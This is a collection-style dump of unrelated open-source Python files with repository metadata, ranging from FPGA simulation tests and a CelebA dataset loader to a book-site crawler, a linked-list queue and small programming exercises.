@simulation_test(sources=(1,))
def test_delay_4_septet(self, tb):
for _ in range(64):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1000001,
REPORT_EVENT|0, 0b1
], [
(0xffff * 64 + 1, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_done(self, tb):
yield from tb.trigger(0, 1)
yield from tb.step()
yield
yield tb.dut.done.eq(1)
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_DELAY|2,
REPORT_SPECIAL|SPECIAL_DONE
], [
(2, {"0": 0b1}),
(4, {})
], flush_pending=False)
@simulation_test(sources=(1,))
def test_throttle_hyst(self, tb):
for x in range(17):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 1)
yield tb.fifo.re.eq(1)
for x in range(51):
yield
yield tb.fifo.re.eq(0)
yield
self.assertEqual((yield tb.dut.throttle), 0)
@simulation_test(sources=(1,))
def test_overrun(self, tb):
for x in range(20):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 1)
yield tb.fifo.re.eq(1)
for x in range(61):
while not (yield tb.fifo.readable):
yield
yield
yield tb.fifo.re.eq(0)
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_SPECIAL|SPECIAL_OVERRUN,
], [
(0x10000, "overrun"),
], flush_pending=False)
|
[
"[email protected]"
] | |
7b7420814b1496c3571d4d75207128c627f763d6
|
a61848fd53eb0b2d569e685781edd5852e739fc8
|
/find_all.py
|
09f8c580afb95bf2fb89fba173b629aa4c2f5925
|
[] |
no_license
|
guaracyalima/python_basics
|
41243e716c3723389a67f44b526d7a33538d3b6d
|
6456084b9735f59d9575b348dff71e9a7cc4917a
|
refs/heads/master
| 2021-08-15T07:57:34.692836 | 2017-11-17T16:05:17 | 2017-11-17T16:05:17 | 111,103,427 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 172 |
py
|
from bs4 import BeautifulSoup
with open('arquivo03.html', 'r') as f:
soup = BeautifulSoup(f, 'lxml')
tag_list = soup.find_all(['ul', 'div'])
print(tag_list)
|
[
"[email protected]"
] | |
18ae1dbba7d5c134023e183f45772eacc5724340
|
015d0ca2e84ee94bd694cfa5fd477d73eed90f36
|
/applications/expensive_seq/expensive_seq.py
|
b307f2b3585261380a99cdd732710b1528f8226c
|
[] |
no_license
|
Edudeiko/Hash-tables-module-project-CS
|
c00448d0e7918e2e433005e541f24da21db8ab37
|
85f23c994983493c64321dce900b4f3faba78003
|
refs/heads/master
| 2023-01-24T09:10:52.105077 | 2020-11-08T17:35:21 | 2020-11-08T17:35:21 | 307,555,285 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 496 |
py
|
'''
start with creating an empty cache table
'''
cache = {}
def expensive_seq(x, y, z):
if x <= 0:
return y + z
if (x, y, z) not in cache:
cache[(x, y, z)] = expensive_seq(x - 1, y + 1, z) + expensive_seq(x - 2, y + 2, z * 2) + expensive_seq(x - 3, y + 3, z * 3)
return cache[(x, y, z)]
if __name__ == "__main__":
for i in range(10):
x = expensive_seq(i*2, i*3, i*4)
print(f"{i*2} {i*3} {i*4} = {x}")
print(expensive_seq(150, 400, 800))
|
[
"[email protected]"
] | |
e0f17e5eeb6554f374cb320cd4367c2d1ad06c2c
|
03ed1f1e259dcf377b3163ee33622546b68379ab
|
/printerque.py
|
3f662a5714da763dfd66e03fe8cc0ad6e64d187d
|
[] |
no_license
|
dustiumus/py-comp-sci-lab
|
dd39aab2092b8c124cc9ca7d62a335631f188880
|
8b6842aafc369e9d18ef61c187089f7858a5b04b
|
refs/heads/main
| 2023-08-22T15:31:04.899642 | 2021-09-03T06:05:01 | 2021-09-03T06:05:01 | 402,664,502 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,795 |
py
|
class Queue():
"""FIFO queue.
Implemented as a linked list. This will be slower than
using a Python list for small lists, but when the list
size is larger than ~5,000 it becomes faster to use,
as it's expensive to pop items off the front of a Python
list (this is an O(n) operation, whereas it's O(1) for
a linked list).
This is useful for studying how linked lists work but,
should you want one in a real-world program, see the
`collections.deque` object --- this is a
doubly-linked list, but it will perform excellently,
given that it is implemented in C.
"""
def __init__(self, inlist):
self._tail = None
self._length = len(inlist)
prev = None
for item in inlist[::-1]:
node = Node(item, next=prev)
if self._tail is None:
self._tail = node
prev = node
self._head = prev
def __repr__(self):
if not self._head:
return "<Queue (empty)>"
else:
return f"<Queue head={self._head.data} tail={self._tail.data} length={self._length}>"
def enqueue(self, item):
"""Add item to end of queue."""
self._length += 1
node = Node(item)
if self._tail:
self._tail.next = node
self._tail = node
else:
self._head = self._tail = node
def dequeue(self):
"""Remove item from front of queue and return it."""
if not self._head:
raise QueueEmptyError()
self._length -= 1
node = self._head
self._head = self._head.next
if not self._head:
self._tail = None
return node.data
def __iter__(self):
"""Allow iteration over list.
__iter__ is a special method that, when defined,
allows you to loop over a list, so you can say things
like "for item in my_queue", and it will pop
successive items off.
"""
while True:
try:
yield self.dequeue()
except QueueEmptyError:
return  # PEP 479: return ends the generator; raising StopIteration here errors on Python 3.7+
def length(self):
"""Return length of queue."""
return self._length
def peek(self):
"""Return, but don't remove, item at front of queue."""
if self.is_empty():
return None
return self._head.data
def empty(self):
"""Empty queue."""
self._tail = self._head = None
self._length = 0
def is_empty(self):
"""Is queue empty?"""
return not bool(self._length)
fruits = Queue(["apple", "berry", "cherry"])
fruits.enqueue("durian")
assert(fruits.length() == 4)
assert(fruits.dequeue() == "apple")
assert(fruits.length() == 3)
def add_jobs():
|
[
"[email protected]"
] | |
97ab50faddc4f97b4337834613ec49e7cd000426
|
45c2455a2ee69e5688fcb65eae8a6982ddc3db9a
|
/exercises/05_basic_scripts/task_5_1b.py
|
bca822d05799bcae12ad27cd0c87d337780bd72d
|
[] |
no_license
|
li-zard/pyeng-ex
|
3d5900b2da8e4ec065e6f5d42d48912c16660deb
|
8d012c73bf900dac9b5051961ce086bc49ea5925
|
refs/heads/main
| 2023-01-24T16:26:17.065511 | 2020-12-10T15:54:35 | 2020-12-10T15:54:35 | 316,801,693 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,770 |
py
|
# -*- coding: utf-8 -*-
"""
Задание 5.1b
Переделать скрипт из задания 5.1a таким образом, чтобы, при запросе параметра,
отображался список возможных параметров. Список параметров надо получить из словаря,
а не прописывать вручную.
Вывести информацию о соответствующем параметре, указанного устройства.
Пример выполнения скрипта:
$ python task_5_1b.py
Введите имя устройства: r1
Введите имя параметра (ios, model, vendor, location, ip): ip
10.255.0.1
Ограничение: нельзя изменять словарь london_co.
Все задания надо выполнять используя только пройденные темы.
То есть эту задачу можно решить без использования условия if.
"""
london_co = {
"r1": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "4451",
"ios": "15.4",
"ip": "10.255.0.1",
},
"r2": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "4451",
"ios": "15.4",
"ip": "10.255.0.2",
},
"sw1": {
"location": "21 New Globe Walk",
"vendor": "Cisco",
"model": "3850",
"ios": "3.6.XE",
"ip": "10.255.0.101",
"vlans": "10,20,30",
"routing": True,
},
}
dev=input("Please input device:")
param=input("Please input param:{}".format(str(london_co[dev].keys())))
device = london_co.get(dev)
print(device[param])
|
[
"[email protected]"
] | |
f3dafd535a8a693bec6ca22cd688aa45fee162b6
|
92ada67b0393303370867eb90d614b363537c8f1
|
/scripts/ugrid_wx.py
|
b1cee6491a8a4ded788e4d83c026e78c74d918d7
|
[] |
no_license
|
brandonmayer-zz/pyugrid
|
158d90a73947624e91f49e69b93c0fae8060d474
|
a101a929c1ec519c752f24889e00797a2514e20d
|
refs/heads/master
| 2021-05-28T06:27:59.350948 | 2014-07-12T21:55:34 | 2014-07-12T21:55:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,997 |
py
|
#!/usr/bin/env python
"""
ugrid_wx.py:
A small wxPython utility app to visualize pyugrids, etc.
"""
import wx
## import the installed version
from wx.lib.floatcanvas import NavCanvas, FloatCanvas
class DrawFrame(wx.Frame):
"""
A frame used for the ugrid viewer
"""
#some parameters for drawing:
background_color = (200,200,200) # grey
label_size = 16
label_color = 'black'
label_background_color = background_color
node_color = 'black'
face_color = 'cyan'
face_edge_color = 'black'
edge_color = 'red'
def __init__(self, *args, **kwargs):
wx.Frame.__init__(self, *args, **kwargs)
self.CreateStatusBar()
# Add the Canvas
Canvas = NavCanvas.NavCanvas(self,-1,
size = (500,500),
ProjectionFun = None,
Debug = 0,
BackgroundColor = self.background_color,
).Canvas
self.Canvas = Canvas
FloatCanvas.EVT_MOTION(self.Canvas, self.OnMove )
self.Show()
Canvas.ZoomToBB()
def Draw_UGRID(self, grid):
"""
Draws a UGRID Object
"""
self.Canvas.ClearAll()
# add the elements:
nodes = grid.nodes
# add the elements:
for i, f in enumerate(grid.faces):
face = nodes[f]
self.Canvas.AddPolygon(face, FillColor=self.face_color, LineColor=self.face_edge_color, LineWidth=2)
mid = face.mean(axis=0)
self.Canvas.AddText(`i`, mid, Size=self.label_size, Position='cc')
# add the edges:
for i, e in enumerate(grid.edges):
edge = nodes[e]
self.Canvas.AddLine(edge, LineColor=self.edge_color, LineWidth=3)
mid = edge.mean(axis=0)
self.Canvas.AddText(`i`,
mid,
Size=self.label_size,
Position='cc',
Color=self.label_color,
BackgroundColor=self.label_background_color)
# add the Nodes
for i, n in enumerate(nodes):
self.Canvas.AddText(`i`, n, Size=self.label_size, BackgroundColor=self.label_background_color)
self.Canvas.AddPointSet(nodes, Diameter=5, Color=self.node_color)
self.Canvas.ZoomToBB()
def OnMove(self, event):
"""
Updates the status bar with the world coordinates
"""
self.SetStatusText("%.2f, %.2f"%tuple(event.Coords))
if __name__ == "__main__":
from pyugrid import test_examples
app = wx.App(False)
F = DrawFrame(None, title="UGRID Test App", size=(700,700) )
#F.Draw_UGRID( test_examples.two_triangles() )
F.Draw_UGRID( test_examples.twenty_one_triangles() )
app.MainLoop()
|
[
"[email protected]"
] | |
bfd4888edb395deaddfdc4022c9b829b04107625
|
024046de7eb1ffd46c77456418b1073e84af15b1
|
/torchvision/prototype/datasets/_builtin/celeba.py
|
ebfce4b652d5b78be5975d14d7c04ac8e4548bb6
|
[
"BSD-3-Clause"
] |
permissive
|
jiafatom/vision
|
ce31eba6fdffce77e9370e0816ffeb0d743bad80
|
7839bdbe1389e734b00529edd9a7566bb8701588
|
refs/heads/main
| 2023-08-27T22:56:28.723162 | 2021-10-25T19:10:20 | 2021-10-25T19:10:20 | 319,733,821 | 0 | 0 |
BSD-3-Clause
| 2020-12-08T19:01:41 | 2020-12-08T19:01:40 | null |
UTF-8
|
Python
| false | false | 6,753 |
py
|
import csv
import io
from typing import Any, Callable, Dict, List, Optional, Tuple, Iterator, Sequence
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
Shuffler,
Filter,
ZipArchiveReader,
Zipper,
KeyZipper,
)
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
GDriveResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import INFINITE_BUFFER_SIZE, getitem, path_accessor
csv.register_dialect("celeba", delimiter=" ", skipinitialspace=True)
class CelebACSVParser(IterDataPipe[Tuple[str, Dict[str, str]]]):
def __init__(
self,
datapipe: IterDataPipe[Tuple[Any, io.IOBase]],
*,
fieldnames: Optional[Sequence[str]] = None,
) -> None:
self.datapipe = datapipe
self.fieldnames = fieldnames
def __iter__(self) -> Iterator[Tuple[str, Dict[str, str]]]:
for _, file in self.datapipe:
file = (line.decode() for line in file)
if self.fieldnames:
fieldnames = self.fieldnames
else:
# The first row is skipped, because it only contains the number of samples
next(file)
# Empty field names are filtered out, because some files have an extra white space after the header
# line, which is recognized as an extra column
fieldnames = [name for name in next(csv.reader([next(file)], dialect="celeba")) if name]
# Some files do not include a label for the image ID column
if fieldnames[0] != "image_id":
fieldnames.insert(0, "image_id")
for line in csv.DictReader(file, fieldnames=fieldnames, dialect="celeba"):
yield line.pop("image_id"), line
class CelebA(Dataset):
@property
def info(self) -> DatasetInfo:
return DatasetInfo(
"celeba",
type=DatasetType.IMAGE,
homepage="https://mmlab.ie.cuhk.edu.hk/projects/CelebA.html",
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
splits = GDriveResource(
"0B7EVK8r0v71pY0NSMzRuSXJEVkk",
sha256="fc955bcb3ef8fbdf7d5640d9a8693a8431b5f2ee291a5c1449a1549e7e073fe7",
file_name="list_eval_partition.txt",
)
images = GDriveResource(
"0B7EVK8r0v71pZjFTYXZWM3FlRnM",
sha256="46fb89443c578308acf364d7d379fe1b9efb793042c0af734b6112e4fd3a8c74",
file_name="img_align_celeba.zip",
)
identities = GDriveResource(
"1_ee_0u7vcNLOfNLegJRHmolfH5ICW-XS",
sha256="c6143857c3e2630ac2da9f782e9c1232e5e59be993a9d44e8a7916c78a6158c0",
file_name="identity_CelebA.txt",
)
attributes = GDriveResource(
"0B7EVK8r0v71pblRyaVFSWGxPY0U",
sha256="f0e5da289d5ccf75ffe8811132694922b60f2af59256ed362afa03fefba324d0",
file_name="list_attr_celeba.txt",
)
bboxes = GDriveResource(
"0B7EVK8r0v71pbThiMVRxWXZ4dU0",
sha256="7487a82e57c4bb956c5445ae2df4a91ffa717e903c5fa22874ede0820c8ec41b",
file_name="list_bbox_celeba.txt",
)
landmarks = GDriveResource(
"0B7EVK8r0v71pd0FJY3Blby1HUTQ",
sha256="6c02a87569907f6db2ba99019085697596730e8129f67a3d61659f198c48d43b",
file_name="list_landmarks_align_celeba.txt",
)
return [splits, images, identities, attributes, bboxes, landmarks]
_SPLIT_ID_TO_NAME = {
"0": "train",
"1": "valid",
"2": "test",
}
def _filter_split(self, data: Tuple[str, Dict[str, str]], *, split: str) -> bool:
return self._SPLIT_ID_TO_NAME[data[1]["split_id"]] == split
def _collate_anns(self, data: Tuple[Tuple[str, Dict[str, str]], ...]) -> Tuple[str, Dict[str, Dict[str, str]]]:
(image_id, identity), (_, attributes), (_, bbox), (_, landmarks) = data
return image_id, dict(identity=identity, attributes=attributes, bbox=bbox, landmarks=landmarks)
def _collate_and_decode_sample(
self,
data: Tuple[Tuple[str, Tuple[str, List[str]], Tuple[str, io.IOBase]], Tuple[str, Dict[str, Any]]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
split_and_image_data, ann_data = data
_, _, image_data = split_and_image_data
path, buffer = image_data
_, ann = ann_data
image = decoder(buffer) if decoder else buffer
identity = int(ann["identity"]["identity"])
attributes = {attr: value == "1" for attr, value in ann["attributes"].items()}
bbox = torch.tensor([int(ann["bbox"][key]) for key in ("x_1", "y_1", "width", "height")])
landmarks = {
landmark: torch.tensor((int(ann["landmarks"][f"{landmark}_x"]), int(ann["landmarks"][f"{landmark}_y"])))
for landmark in {key[:-2] for key in ann["landmarks"].keys()}
}
return dict(
path=path,
image=image,
identity=identity,
attributes=attributes,
bbox=bbox,
landmarks=landmarks,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
splits_dp, images_dp, identities_dp, attributes_dp, bboxes_dp, landmarks_dp = resource_dps
splits_dp = CelebACSVParser(splits_dp, fieldnames=("image_id", "split_id"))
splits_dp = Filter(splits_dp, self._filter_split, fn_kwargs=dict(split=config.split))
splits_dp = Shuffler(splits_dp, buffer_size=INFINITE_BUFFER_SIZE)
images_dp = ZipArchiveReader(images_dp)
anns_dp = Zipper(
*[
CelebACSVParser(dp, fieldnames=fieldnames)
for dp, fieldnames in (
(identities_dp, ("image_id", "identity")),
(attributes_dp, None),
(bboxes_dp, None),
(landmarks_dp, None),
)
]
)
anns_dp = Mapper(anns_dp, self._collate_anns)
dp = KeyZipper(
splits_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=path_accessor("name"),
buffer_size=INFINITE_BUFFER_SIZE,
keep_key=True,
)
dp = KeyZipper(dp, anns_dp, key_fn=getitem(0), buffer_size=INFINITE_BUFFER_SIZE)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
|
[
"[email protected]"
] | |
6bb43b959aa84ac5c99dfd6715abbd08d279a89d
|
340cffbb27fa99491e12902c673e3cca1593737c
|
/homebytwo/routes/migrations/0003_remove_segment.py
|
fc446f32dcc45042e6dd59bab2e22b826340523d
|
[
"MIT"
] |
permissive
|
HomebyTwo/homebytwo
|
85d90b9b453fe0d50ca44a48437b6f35631f57b5
|
29d26ce9f5586943e3b64c95aa4ce9ea7263bd10
|
refs/heads/master
| 2022-12-09T15:43:42.765518 | 2020-12-01T11:31:49 | 2020-12-01T11:31:49 | 75,376,872 | 7 | 0 |
MIT
| 2022-12-09T11:19:29 | 2016-12-02T08:35:07 |
Python
|
UTF-8
|
Python
| false | false | 568 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-03 11:39
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('routes', '0002_route_data'),
]
operations = [
migrations.RemoveField(
model_name='segment',
name='end_place',
),
migrations.RemoveField(
model_name='segment',
name='start_place',
),
migrations.DeleteModel(
name='Segment',
),
]
|
[
"[email protected]"
] | |
18f71ff081c3f7d2ea9d18c72d99ea233b3b5d56
|
3eb9b5da2fd9e5e8acfac096921ab7f6b95ddfea
|
/ml-clustering-neuronal-networks/main.py
|
1c7f767bec9ed816da26b7f34ce920555a2d82b1
|
[] |
no_license
|
sebastianvolti/ml-clustering-neuronal-networks
|
a401c3f54dc37978ea22dfb19d4ed03dd96a25df
|
7f386a12718ebd25227d0bc3d07e3eb82373dee2
|
refs/heads/master
| 2023-03-30T07:18:13.833712 | 2021-03-06T20:18:23 | 2021-03-06T20:18:23 | 345,186,528 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,418 |
py
|
import pandas as pd
import numpy as np
import argparse
import copy
import knn
import logging
import statistics
import random
import utils
import dataset_analysis
import means
import means_plot
from attributes import DATASET_ATTRS, DATASET_FILE, DATASET_FILE_NUM, DATASET_HEADERS, DATASET_CLASS
from sklearn import neighbors
################## Basic config ##################
DEBUG = True
# Read the command-line arguments
ap = argparse.ArgumentParser(
description='AprendAut assignment')
ap.add_argument('-s', '--seed', default=3, help='Seed to use for the random library')
ap.add_argument('-d', '--debug_level', default=2, help='0 to print nothing, 1 for info messages, 2 for debug messages')
ap.add_argument('-p', '--part', help='Which part of the assignment to run: a, b or c')
ap.add_argument('-g', '--graficos', default=0, help='1 to show the plots, 0 otherwise')
ap.add_argument('-r', '--runs', default=500, help='Number of k-means runs searching for optimal clusters')
ap.add_argument('-l', '--limit', default=300, help='Iteration limit for each k-means run')
ap.add_argument('-n', '--normalize', default=0, help='1 to work with normalized attributes, 0 otherwise')
ap.add_argument('-i', '--ideology_groups', default=0, help='1 to work with grouped ideologies, 0 otherwise')
args = vars(ap.parse_args())
seed = int(args['seed'])
debug_level = int(args['debug_level'])
part = args['part']
plot_grafics = int(args['graficos'])
runs_k_means = int(args['runs'])
iters_k_means = int(args['limit'])
normalize = int(args['normalize'])
ideology_groups = int(args['ideology_groups'])
if debug_level == 0:
logging_level = logging.WARNING
elif debug_level == 1:
logging_level = logging.INFO
elif debug_level == 2:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format='%(message)s')
################## Start of main ##################
def main():
random.seed(seed)
np.random.seed(seed)
# Read the numeric csv
dataset_num = pd.read_csv(DATASET_FILE_NUM, delimiter=',', names=DATASET_HEADERS, header=None, engine='python')
# Preprocess the dataset
dataset = utils.preprocess_dataset(dataset_num, ideology_groups)
if part == 'a':
# Analysis of the regular dataset
analysis = dataset_analysis.get_analysis(dataset, DATASET_ATTRS, DATASET_CLASS)
print(analysis)
# Analysis of the numeric dataset
analysis_num = dataset_analysis.get_analysis(dataset_num, DATASET_ATTRS, DATASET_CLASS)
print(analysis_num)
if (plot_grafics > 0):
dataset_analysis.get_plots(dataset_num)
pc_dataset = dataset_analysis.get_pca(dataset_num)
dataset_analysis.plot_clusters(pc_dataset, 'pc1', 'pc2')
elif part == 'c':
if (normalize > 0):
dataset = utils.normalize(dataset)
if (plot_grafics > 0):
means_plot.pruebita(dataset)
#k-means
means.means(dataset, runs_k_means, iters_k_means, plot_grafics)
elif part == 'd':
if (normalize > 0):
dataset = utils.normalize(dataset)
# Cross validation
cv_examples, cv_classes = utils.get_classes(dataset)
ks = [x for x in range(1, 44, 2)]
best_k = ks[0]
best_score = 0
for k in ks:
logging.info(f"Evaluando cross validation de KNN con k={k}")
scores = knn.cross_val(neighbors.KNeighborsClassifier(n_neighbors=k), cv_examples, cv_classes.values.ravel(), scoring='accuracy', cv_folds=5)
mean_score = statistics.mean(scores)
logging.info(f"El accuracy promedio obtenido es {mean_score*100:.2f}%")
if mean_score > best_score:
best_k = k
best_score = mean_score
logging.info(f"")
logging.info(f"El mejor k es {best_k}")
logging.info(f"")
# Partition the dataset
TSET_PERCENTAGE = 0.9
training_set, evaluation_set = utils.partition_sets(dataset, TSET_PERCENTAGE, no_class=True)
training_examples, training_classes = utils.get_classes(training_set)
evaluation_examples, evaluation_classes = utils.get_classes(evaluation_set)
# KNN
classifier_knn = knn.scikit_knn(training_examples, training_classes, k=best_k)
obtained_classes_knn = utils.classify_examples(classifier_knn, evaluation_examples)
# Metrics
logging.info(f"Scikit KNN results")
logging.info(f"Micro-averaged results")
metrics = utils.get_metrics(obtained_classes_knn, evaluation_classes, average='micro')
utils.print_metrics(metrics)
logging.info(f"")
logging.info(f"Resultados macro")
metrics = utils.get_metrics(obtained_classes_knn, evaluation_classes, average='macro')
utils.print_metrics(metrics)
elif part == 'e':
estratificacion=dataset['ideology'].value_counts()
attrs = copy.deepcopy(DATASET_ATTRS)
print(estratificacion)
dataset_analysis.mean_var_std(dataset)
dataset_analysis.histogram_vs_ideology(dataset,attrs)
dataset_analysis.kdeplot_vs_ideology(dataset,attrs)
dataset_analysis.Box_plot(dataset,attrs)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
16321033f51ae465e1c80dde7ae0eea9def38c33
|
e26f8069953f17a267d9dcb61d3bb18d6a4f1847
|
/step3/scraping/py_zip/python_crawler_final.py
|
c8978ba193ef2002acb91fd3bdc5d6cd6ff95433
|
[] |
no_license
|
BingSuYam/Ubuntu_Python_crawling-scraping
|
a89dbd8e12f8831bbe9c5b8e507f2d31303b807a
|
3ebd88cd269b275a1f983a4c730d81b4318569ef
|
refs/heads/master
| 2021-05-23T08:02:33.180672 | 2020-04-19T09:15:53 | 2020-04-19T09:15:53 | 253,188,824 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,734 |
py
|
import time # import the time module
import re # import the re module
import requests
import lxml.html
from pymongo import MongoClient
def main():
"""
Main processing of the crawler
"""
# Connect to MongoDB on the crawler host.
client = MongoClient('localhost', 27017)
# The ebooks collection in the scraping database
collection = client.scraping.ebooks
# Create an index on the key field, which stores a unique key identifying each record.
collection.create_index('key', unique=True)
# Fetch the list page.
response = requests.get('http://www.hanbit.co.kr/store/books/new_book_list.html')
# Extract the list of detail-page URLs.
urls = scrape_list_page(response)
for url in urls:
cnt = 1
# Extract the key from the URL.
key = extract_key(url)
# Look up the record for this key in MongoDB.
ebook = collection.find_one({'key':key})
# Crawl the detail page only if it is not already in MongoDB.
if not ebook:
time.sleep(1)
response = requests.get(url) # Fetch the detail page using a Session.
ebook = scrape_detail_page(response) # Extract the detailed info from the detail page.
# Save the book info to MongoDB.
collection.insert_one(ebook)
print('>>>> Saving book info. ::: %d' , cnt)
cnt+=1
def scrape_list_page(response):
"""
Extract the URLs of the detail pages from the list-page Response.
"""
root = lxml.html.fromstring(response.content)
root.make_links_absolute(response.url)
for a in root.cssselect('.view_box .book_tit a'):
url = a.get('href')
yield url
def scrape_detail_page(response) :
"""
Extract the book info from the detail-page Response as a dict.
"""
root = lxml.html.fromstring(response.content)
ebook = {
'url': response.url,
'key': extract_key(response.url),
'title': root.cssselect('.store_product_info_box h3')[0].text_content(),
'price': root.cssselect('.pbr strong')[0].text_content(),
'content': "omitted"
}
return ebook
def extract_key(url) :
"""
Extract the key (the p_code at the end of the URL) from the URL.
"""
m = re.search(r"p_code=(.+)",url)
return m.group(1)
def normalize_spaces(s):
"""
Collapse consecutive whitespace into a single space.
"""
return re.sub(r'\s+', '',s).strip()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f94ef394016ab76292cd46b7c523ddb2b452f32a
|
edda54d9c20a9fa7ee4ab029f8adedbec89fef9a
|
/contactquery.py
|
e0cd85cbf686200cbde051f5f7cdd545b9082075
|
[] |
no_license
|
travisbrkr1234/javaassist
|
7e88ce0c51537dab10266b953d3739224a01ce77
|
9fb4ab8cca370865712d1403e365afc92aae5206
|
refs/heads/master
| 2016-09-06T17:02:37.594670 | 2015-07-10T15:13:27 | 2015-07-10T15:13:27 | 38,782,103 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 382 |
py
|
import sys
sys.path.append("C:\\Users\\carlos.ochoa\\Documents\\Support Dev\\Python\\csvToolbox\\")
import csv
import ISServer_master as ISServer
infusionsoftapp = "as113"
infusionsoftAPIKey = ""
thisserver = ISServer.ISServer(infusionsoftapp, infusionsoftAPIKey)
allrecords = thisserver.getAllRecords("Contact")
for eachrecord in allrecords:
print "id: %s"%(eachrecord["Id"])
|
[
"[email protected]"
] | |
97cc36dd32b2d5cd5c4ab97c7b39c7420193152f
|
8b9c84f2540ef9de8830232898b7b3636523ceff
|
/Problem1.py
|
4d8d558f4df6dcc8a1440776e4ca8d187309fb29
|
[] |
no_license
|
s-andromeda/Binary-Search-3
|
e06b73352af51666bd7d8bf0f4f33a6ec54b9dba
|
eafd90e65bd04ca544c80d5f24a9ceef55786ad2
|
refs/heads/master
| 2022-11-17T07:18:50.414405 | 2020-07-21T07:06:29 | 2020-07-21T07:06:29 | 280,072,057 | 0 | 0 | null | 2020-07-16T06:24:20 | 2020-07-16T06:24:19 | null |
UTF-8
|
Python
| false | false | 704 |
py
|
"""
Student : Shahreen Shahjahan Psyche
Time : O(log N) [binary search]
Space : O(1) [No Auxiliary Space Has Been Used]
Passed Test Cases : Yes
"""
class Solution:
def myPow(self, x: float, n: int) -> float:
# base case
if n == 0:
return 1
# calling recursive function after halfing n
temp = self.myPow(x, int(n/2))
# if n is even
if n%2 == 0:
return temp * temp
else:
# if n is positive
if n > 0:
return temp * temp * x
else:
return temp * temp * (1/x)
|
[
"[email protected]"
] | |
0ecfe2662d567c63db7e2c659f8b3058a8b7db30
|
1c2b90d6e0c44faabadace30f81cefb037e46e76
|
/Anserini-master/src/main/python/jdiq2018_effectiveness/run_batch.py
|
ba6de46914aa5ce638e030bcd0d6559640922b49
|
[
"Apache-2.0"
] |
permissive
|
sandeepsuri/capstone_ryerson
|
77bd33e1362db1ec36aafc8d7c0faa75e0998a12
|
c632f690e75a17144a681428ee05660a86a02666
|
refs/heads/master
| 2023-04-16T13:52:18.967986 | 2020-01-31T09:57:01 | 2020-01-31T09:57:01 | 156,599,953 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,888 |
py
|
# -*- coding: utf-8 -*-
"""
Anserini: A toolkit for reproducible information retrieval research built on Lucene
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import subprocess
import argparse
from multiprocessing import Pool
import json
import logging
import yaml
from search import Search
from evaluation import Evaluation
from effectiveness import Effectiveness
logger = logging.getLogger('jdiq2018_effectiveness')
logger.setLevel(logging.INFO)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
parallelism=1
def batch_everything(all_params, func):
if len(all_params) == 0:
return
p = Pool(parallelism)
p.map(func, all_params)
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
def get_index_path(yaml_data):
"""
Find the possible index path
"""
index_path = os.path.join('lucene-index.{0}.pos+docvectors{1}'.format(yaml_data['name'], \
'+rawdocs' if '-storeRawDocs' in yaml_data['index_options'] else ''))
if not os.path.exists(index_path):
index_path = yaml_data['index_path']
if not index_path or not os.path.exists(index_path):
for input_root in yaml_data['input_roots']:
if os.path.exists(os.path.join(input_root, yaml_data['index_path'])):
index_path = os.path.join(input_root, yaml_data['index_path'])
break
return index_path
def batch_retrieval(collection_yaml, models_yaml, output_root):
all_params = []
program = os.path.join(collection_yaml['anserini_root'], 'target/appassembler/bin', 'SearchCollection')
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
